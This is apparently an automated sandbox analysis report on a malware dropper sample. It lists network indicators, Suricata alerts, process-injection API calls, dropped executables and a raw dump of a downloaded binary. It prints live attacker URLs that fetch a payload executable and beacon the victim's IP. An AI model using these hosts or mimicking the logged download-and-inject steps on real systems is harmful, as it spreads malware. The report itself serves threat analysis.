popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

288c47bbc1871b42239df19ff4df68f076.exe

Generic Malware NSIS Malicious Library Malicious Packer Admin Tool (Sysinternals etc ...) Antivirus UPX Anti_VM AntiDebug PNG Format OS Processor Check MZP Format CHM Format .NET EXE JPEG Format PE64 PE File DLL ZIP Format BMP Format AntiVM icon PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 26, 2023, 7:53 a.m. Dec. 26, 2023, 8 a.m.
Size 6.8MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 3954cc01c26d1962284f3b95602f2367
SHA256 8c887835f3b1861776b4d88a9c47dbe945dcadfd881b4ae9909488c022924cf6
CRC32 E4A79FB3
ssdeep 196608:tvt0kQnhCtKZSqNcg7xAtipQrBiS9cWzAY5do:trmhCfqNDtAtUQdiS9cWzDK
Yara
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)

Name Response Post-Analysis Lookup
zonealarm.com
A 209.87.209.205
209.87.209.205
iplogger.com
A 172.67.188.178
A 104.21.76.57
104.21.76.57
malwarebytes.com
A 192.0.66.233
192.0.66.233
www.kaspersky.com
CNAME multisite3.geo.kaspersky.com
A 185.85.15.47
185.85.15.47
api.ipify.org
A 173.231.16.77
A 64.185.227.156
CNAME api4.ipify.org
A 104.237.62.212
173.231.16.77
IP Address Status Action
104.21.76.57 Active Moloch
164.124.101.2 Active Moloch
185.85.15.47 Active Moloch
192.0.66.233 Active Moloch
209.87.209.205 Active Moloch
5.42.64.35 Active Moloch
64.185.227.156 Active Moloch
91.92.254.7 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
UDP 192.168.56.103:52760 -> 8.8.8.8:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.168.56.103:49173 -> 5.42.64.35:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 5.42.64.35:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 5.42.64.35:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.64.35:80 -> 192.168.56.103:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 91.92.254.7:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
UDP 192.168.56.103:50800 -> 164.124.101.2:53 2047719 ET INFO External IP Lookup Domain (iplogger .com in DNS lookup) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49168 -> 64.185.227.156:80 2029622 ET POLICY External IP Lookup (ipify .org) Potential Corporate Privacy Violation
TCP 192.168.56.103:49168 -> 64.185.227.156:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
TCP 192.0.66.233:443 -> 192.168.56.103:49200 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49198 -> 192.0.66.233:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49187 -> 185.85.15.47:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49186 -> 185.85.15.47:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49191 -> 185.85.15.47:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49199 -> 192.0.66.233:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49194 -> 192.0.66.233:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49195 -> 192.0.66.233:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49176 -> 104.21.76.57:443 2047718 ET INFO External IP Lookup Domain (iplogger .com in TLS SNI) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49176 -> 104.21.76.57:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49178 -> 209.87.209.205:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.85.15.47:443 -> 192.168.56.103:49188 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 185.85.15.47:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.85.15.47:443 -> 192.168.56.103:49192 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.0.66.233:443 -> 192.168.56.103:49196 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 209.87.209.205:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49182 -> 209.87.209.205:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49181 -> 209.87.209.205:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49176
104.21.76.57:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=iplogger.com c1:91:92:9b:9a:80:29:75:dc:65:9b:a4:c0:11:8c:ac:72:d6:77:58

Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features Connection to IP address suspicious_request GET http://91.92.254.7/scripts/plus.php?ip=175.208.134.152&substr=nine&s=ab
suspicious_features Connection to IP address suspicious_request GET http://5.42.64.35/syncUpd.exe
request GET http://api.ipify.org/?format=dfg
request GET http://91.92.254.7/scripts/plus.php?ip=175.208.134.152&substr=nine&s=ab
request GET http://5.42.64.35/syncUpd.exe
request GET https://iplogger.com/19nVA4
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 458752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00240000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00270000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1704
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1704
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 524288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00440000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00480000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00415000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00417000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00650000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4161536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02910000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2096
region_size: 9351168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02d10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 36864
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008ac000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2192
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00330000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00380000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2512
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 86016
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0092c000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2512
region_size: 114688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 9914630144
free_bytes_available: 9914630144
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 9936683008
free_bytes_available: 9936683008
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 10021916672
free_bytes_available: 10021916672
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 10021916672
free_bytes_available: 10021916672
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 10021916672
free_bytes_available: 10021916672
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 10021965824
free_bytes_available: 10021965824
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 10021965824
free_bytes_available: 10021965824
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 10021965824
free_bytes_available: 10021965824
root_path: C:
total_number_of_bytes: 34252779520
1 1 0
domain api.ipify.org
file C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
file C:\Users\test22\AppData\Local\Temp\nsqD995.tmp.exe
file C:\Users\test22\AppData\Local\Temp\toolspub2.exe
file C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file C:\Users\test22\AppData\Local\Temp\nstC783.tmp\INetC.dll
file C:\Users\test22\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
file C:\Users\test22\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
file C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
file C:\Users\test22\AppData\Local\Temp\toolspub2.exe
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file C:\Users\test22\AppData\Local\Temp\288c47bbc1871b42239df19ff4df68f076.exe
file C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
file C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
file C:\Users\test22\AppData\Local\Temp\nsqD995.tmp.exe
file C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUPUI.DLL
file C:\Users\test22\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
file C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUP.DLL
file C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUP.DLL
file C:\Users\test22\AppData\Local\Temp\Setup000023ac\ose00000.exe
file C:\Users\test22\AppData\Local\Temp\Setup00000994\ose00000.exe
file C:\Users\test22\AppData\Local\Temp\toolspub2.exe
file C:\Users\test22\AppData\Local\Temp\nstC783.tmp\INetC.dll
file C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUPUI.DLL
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¥Ú®cà  TÖBÃ?p@ E[ȚdÀDèTàq@Ž@p”.textrRT `.rdataà3p4X@@.dataØB°Œ@À.rsrcèTÀDV¤@@U‹ìVEP‹ñè—)ÇrB‹Æ^]ÂÌÌÌÌÇrBéH*ÌÌÌÌÌU‹ìV‹ñèåÿÿÿöEt Vè],ƒÄ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ì ‹E QR‹U QRè7,ƒÄ]ÃÌÌÌU‹ì ‹E QR‹U QRè (ƒÄ]ÃÌÌÌf‹f‰ ÃÌÌÌÌÌÌÌÌÌhLBèÐ+ƒÄÃÌÌU‹ìP‹EVè“ÿÿÿƒÄ‹Æ]ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìP‹EVè“ÿÿÿƒÄ‹Æ]ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ì‹E Š‹Uˆ ]Ã̊3À: ”ÀÃÌÌÌÌÌÌU‹ì‹E‹M‹U V‹uPQRVèv+ƒÄ‹Æ^]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌ̊ÃÌÌÌÌÌÌÌÌÌÌÌÌ̶ÃÌÌÌÌÌÌÌÌÌÌÌ̋3À; ”ÀÃÌÌÌÌÌ̃ÈÿÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìèèÿÿÿ‹M‹ ;Èt‹Á]Ã3҅À”‹Â]ÃU‹ìQV‹ñjMüèL‹Fƒøÿs@‰FMüè`^‹å]ÃÌÌÌÌÌÌU‹ìQVW‹ùjMüè‹G…Àv ƒøÿsH‰G‹w÷Þö÷֍Mü#÷è _‹Æ^‹å]ÃÌÌÌè$‰èÂ"‹Èè}ÿÿÿ‹ÆÃÌÌÌÌÌÌÌÌÌ̋ …Étè•ÿÿÿ…Àt ‹‹È‹jÿÐÃÌÌÌÌÌÌU‹ìÙEjƒìÝ$èD(Ù]ƒÄ ÙE]¸lf£"¬„¹mf‰ ¬„ºgf‰¬„3ɸdºlf£ ¬„f‰ &¬„f‰$¬„¸.¹2ºmf£¬„f‰ ¬„f‰¬„¸i¹3ºsh¬„f£¬„f‰ ¬„f‰¬„ÿ$pBÃÌÌÌÌÌÌÌÌÌÌ́á4ïÆÃÌÌÌÌÌÌÌÌÌU‹ìì0=p¶„”‹ESVW‹8‹@‰Eøujÿ\pBjÿdpB‹ ˜ÂB‹œÂBEèÇEè‰M܉UÔèœÿÿÿ‹]è¡ ÂB‹ ¤ÂBÃ?‰]è‰EЉMØÇEä 덛ÇEôƒEô‹ p¶„‹ÇÁà‰Eüƒù uBj•ÐûÿÿRjÿtpBjjjjjjjjÿlpBÿ pBjjjÿhpB‹Eü‹ p¶„EЉEüù©u Ç ¬„@.ëíëùëu ÇÀ¥„‹Mô‹÷Óî;‰EðǬ„î=êôu؋Eð1Eü=p¶„æ u jjjÿpB3uü‰uà‹EàƒEød)Eøƒmød‹MøÁá‰Mü‹EÜEüÇEì‹EèEì‹EøEì‹Eì‰Eð‹uø‹Mô‹Uð1UüÓîuԁ=p¶„!u jjjÿPpB‹Eü3ƁÃG†Èa+øƒmä‰Eü‰]è…¹þÿÿ=p¶„m ‹u‰>ujjÿ¬pB‹Eø_‰F^[‹å]‹Mø_‰N^[‹å]ÂU‹ì¡p¶„‹ Ä¥„Áèì…À†S‹ŒpBV‹5pBW‹=˜pB‰Mü‰Eø›=p¶„Y uLjjjÿÖj…ø÷ÿÿPjh ŒBjjÿ×jjh¼ŒBh܌BjÿÓjÿ”pBjjjjjjjÿ,pB‹MüQè_ýÿÿƒEüƒmøu•_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQÇEüEü3‹EüÄ¥„‹å]ÃÌQhHÔBÿœpBÃÌÌÌU‹ìd¡jÿhèaBPd‰%ì=p¶„±SVW…¦jjEèPjjjÿpBjjjjÿ pBjjÿ(pBjÿ„pBMðQÿ¨pBuÌèéjÇEüèÚ%ƒÄjjèp"ƒÄéWÿÿÿjè½&ƒÄjèÃ&Ç$èŠûÿÿÝ؍U„RèïM„è7‹ÆÇEüÿÿÿÿ蹡p¶„KPj£p¶„ÿXpB‹p¶„MìQj@RP£Ä¥„ÿxpB‹= pB3öþ'} …ðúÿÿPjÿ×Fþ̜ô|ä‹ p¶„3ö…Éva‹=8pB‹€pBë ¤$I‹ t¶„Š”1K¡Ä¥„ˆ0‹ p¶„ù¨u!jMðQÿ×jjÿ°pB•ðþÿÿRÿӋ p¶„F;ñr·3ÀëIƒú„‰@=!–|ìèWýÿÿ‹=<pB3öÿ׃þ&uèþÿÿFþ?u|ë‹5`pB‹=LpB»{덤$=p¶„†ujhˆBh˜BÿÖjjÿ×jjÿ°pBƒëuÑè<úÿÿ‹Mô_^[d‰ ‹å]ËEìPÿ0pBÌU‹ìì$=p¶„VWuQjÿŒqBjEüPjjjÿTpBjjÿ|pBjjÿˆpBjjÿpBjjÿpBuÜèÿ‹Îè‹}üS‹ˆqB3öþP }jjÿÓÿ<pBþ‹ö*~ÿ¢Ùxu Fþ]|Ӌ=@pB‹¤pB3öjÿ×ÿ<pBÿӁþGm  Fþ¤ö|ã‹]ü‹=ppB3öjÿׁþ%+~ûÕtPxu Fþ|㋠ÜÄB‹°ÄB‰ p¶„‰t¶„è®üÿÿ‹54pB¿[‹ÿ=p¶„uj…ÜûÿÿPh°Bÿփïuß¡Ä¥„£¬„ÿÐ_3À^‹å]ÂÌÌÌÌÌÌÌÌÌQ‹Ìè8 ‹Îè! jj‹ÎèÆ ‹ÆÃÌÌÌjjè· ÃÌÌÌÌÌÌV‹ñ‹N8Ç̍B…Étjè9 N^éQèk÷ÿÿÂÌÌÌÌÌÌÌÌè[÷ÿÿÂÌÌÌÌÌÌÌÌ3ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌé;÷ÿÿÌÌÌÌÌÌÌÌÌÌÌU‹ìƒìV‹ñ‹‹PWÿ҉Eüè÷ÿÿ‹øUüEø‰}øè÷öÿÿ„Àt‹Ç_^‹å]ËÎè´ èÏöÿÿ_^‹å]ÃÌÌÌÌÌÌÌÌÌU‹ì‹U ‹‹@R‹UjÿRÿÐ]ÂÌÌÌÌÌÌÌÌU‹ìƒìVW‹}3ö‰Mü‰uø…ÿŽ†S‹]‹Eüèh …À~2;ø‹ð}‹÷‹EüVèà P‹E PSè‹Uüuø‹ÎÞ+þèç ‹uøë4‹Mü‹‹BÿЉEèPöÿÿ‰EUEè2öÿÿ„ÀuEèöÿÿFˆC‰uøO…ÿŠ[_‹Æ^‹å] _‹Æ^‹å] ÌÌÌÌÌU‹ìƒìSW‹} 3À‹Ù‰Eü…ÿ~{V‹ÃèB …À~.;ø‹ð}‹÷‹MVQP‹Ãè9 Pècuuü‹Î‹Ó+þè² ë9‹E‹3è–õÿÿ‹VP‹Ëÿ҉E è¦õÿÿ‰EøU Eøèˆõÿÿ„Àu¸EEü+ø…ÿŠ‹Eü
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x006bfe00', u'virtual_address': u'0x00002000', u'entropy': 7.983594764372087, u'name': u'.text', u'virtual_size': u'0x006bfdb4'} entropy 7.98359476437 description A section with a high entropy has been found
entropy 0.999710710928 description Overall entropy of this PE file is high
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
host 5.42.64.35
host 91.92.254.7
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2364
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000084
1 0 0
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
Time & API Arguments Status Return Repeated

LdrGetDllHandle

 module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

 module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
file C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2364
process_handle: 0x00000084
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Process injection Process 2192 called NtSetContextThread to modify thread in remote process 2364
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 1638384
registers.edi: 0
registers.eax: 4206040
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000080
process_identifier: 2364
1 0 0
file C:\Windows\Prefetch\PYTHON.EXE-C663CFDC.pf
file C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-305B5E54.pf
file C:\Windows\Prefetch\AUDIODG.EXE-BDFD3029.pf
file C:\Windows\Prefetch\THUNDERBIRD.EXE-A0DA674F.pf
file C:\Windows\Prefetch\DLLHOST.EXE-4F28A26F.pf
file c:\Windows\Temp\fwtsqmfile01.sqm
file C:\Windows\Prefetch\SVCHOST.EXE-7AC6742A.pf
file C:\Windows\Prefetch\GOOGLEUPDATE.EXE-D0E66F4A.pf
file C:\Windows\Prefetch\86.0.4240.111_CHROME_INSTALLE-AF26656A.pf
file C:\Windows\Prefetch\CMD.EXE-4A81B364.pf
file C:\Windows\Prefetch\CSC.EXE-BE9AC2DF.pf
file c:\Windows\Temp\fwtsqmfile00.sqm
file C:\Windows\Prefetch\MSCORSVW.EXE-57D17DAF.pf
file C:\Windows\Prefetch\SOFTWARE_REPORTER_TOOL.EXE-EB18F4FF.pf
file C:\Users\test22\AppData\Local\Temp\~DF8C0F100C7231519A.TMP
file C:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
file C:\Windows\Prefetch\DLLHOST.EXE-5E46FA0D.pf
file C:\Windows\Prefetch\SLUI.EXE-724E99D9.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-1304AE86.pf
file C:\Windows\Prefetch\PING.EXE-7E94E73E.pf
file C:\Windows\Prefetch\GOOGLEUPDATE.EXE-C3A1B497.pf
file C:\Windows\Prefetch\IEXPLORE.EXE-4B6C9213.pf
file C:\Windows\Prefetch\WMIPRVSE.EXE-1628051C.pf
file C:\Windows\Prefetch\DEFRAG.EXE-588F90AD.pf
file C:\Windows\Prefetch\CHROME.EXE-D999B1BA.pf
file C:\Windows\Prefetch\IMKRMIG.EXE-AAA206C5.pf
file C:\Windows\Prefetch\UNPACK200.EXE-E4DF1A4E.pf
file C:\Windows\Prefetch\DLLHOST.EXE-40DD444D.pf
file C:\Windows\Prefetch\7ZFM.EXE-22E64FB8.pf
file C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-B0D5C571.pf
file C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-34B7EAE8.pf
file C:\Windows\Prefetch\SVCHOST.EXE-E1E0ACE0.pf
file C:\Windows\Prefetch\LOGONUI.EXE-09140401.pf
file C:\Windows\Prefetch\AgGlFgAppHistory.db
file C:\Windows\Prefetch\JAVAW.EXE-D0AA8787.pf
file C:\Windows\Prefetch\SSVAGENT.EXE-0CD059B7.pf
file C:\Windows\Prefetch\AgGlUAD_P_S-1-5-21-3832866432-4053218753-3017428901-1001.db
file C:\Windows\Prefetch\OSE.EXE-2B23CA4C.pf
file C:\Windows\Prefetch\INSTALLER.EXE-60163557.pf
file C:\Windows\Prefetch\PINGSENDER.EXE-8E79128B.pf
file C:\Windows\Prefetch\MSCORSVW.EXE-C3C515BD.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-5A853E81.pf
file C:\Windows\Prefetch\AgRobust.db
file C:\Windows\Prefetch\ICACLS.EXE-B19DE1F7.pf
file C:\Windows\Prefetch\IMEKLMG.EXE-3FEB7CC0.pf
file C:\Windows\Prefetch\GOOGLEUPDATECOMREGISTERSHELL6-BB6760AF.pf
file C:\Windows\Prefetch\NOTEPAD.EXE-D8414F97.pf
file C:\Windows\Prefetch\7ZG.EXE-0F8C4081.pf
file C:\Windows\Prefetch\CMD.EXE-AC113AA8.pf
file C:\Windows\Prefetch\AgGlGlobalHistory.db
file C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file C:\Windows\Prefetch\SNIPPINGTOOL.EXE-EFFDAFDE.pf
file C:\Windows\Prefetch\IMEKLMG.EXE-3FEB7CC0.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\dropbox_logo_text_2015-vfld7_dJ8[1].svg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\override[1].css
file C:\Windows\Prefetch\SVCHOST.EXE-7AC6742A.pf
file C:\Windows\Prefetch\SVCHOST.EXE-80F4A784.pf
file C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\desktop.ini
file C:\Users\test22\AppData\Local\Temp\{E7573238-1B24-467B-B5A4-0BE967E0BF64}.tmp
file C:\Windows\Prefetch\CONTROL.EXE-817F8F1D.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\mnrstrtr[1].js
file C:\Windows\Prefetch\MSCORSVW.EXE-90526FAC.pf
file C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000026.log
file C:\Windows\Prefetch\RUNDLL32.EXE-5A853E81.pf
file C:\Windows\Prefetch\CVTRES.EXE-2B9D810D.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\SOC-Facebook[1].png
file C:\Windows\Prefetch\RUNDLL32.EXE-8C11D845.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f[2].txt
